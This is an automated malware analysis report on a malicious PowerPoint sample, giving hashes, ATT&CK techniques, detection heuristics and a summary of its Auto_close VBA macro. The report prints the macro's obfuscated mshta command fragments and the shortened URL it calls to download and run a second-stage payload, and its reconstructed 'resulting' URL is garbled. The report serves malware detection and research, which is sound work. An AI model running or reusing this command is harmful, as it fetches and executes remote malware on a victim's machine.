Office (OLE) / .PPT malware analysis — malicious · 8302bbed582f4597

MALICIOUS

Office (OLE) / .PPT

70.0 KB Created: 2020-06-03 15:33:27 Authoring application: Microsoft Office PowerPoint

MD5: 1481d59c6e2dd96b7652d9dcaa12db86 SHA-1: 1f12dbc08d3fcea5ba502a510deb6988a231c3fd SHA-256: 8302bbed582f4597aa196773170095fbb143a13f8ffa856b74ab46a5bf7a2793

162 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample is a PowerPoint file containing VBA macros. The Auto_close macro triggers the execution of a Shell command. This command constructs a URL by concatenating strings: "m" + "s" + "h" + "ta http://%20%20@j.mp/dojifsdddddttyfdspfpmidfkdvko", resulting in the full URL "mshhttp://%20%20@j.mp/dojifsdddddttyfdspfpmidfkdvko". This URL is likely used to download and execute a second-stage payload.

Heuristics 5

Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Auto_Close macro high OLE_VBA_AUTOCLOSE

Auto_Close macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://%20%20@j.mp/dojifsdddddttyfdspfpmidfkdvko

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas` `c61c6a3c5e6984ac579f5d20c094f3cd9c5d09cfcf6a566bf038fa60b47eb1b9`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	570 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.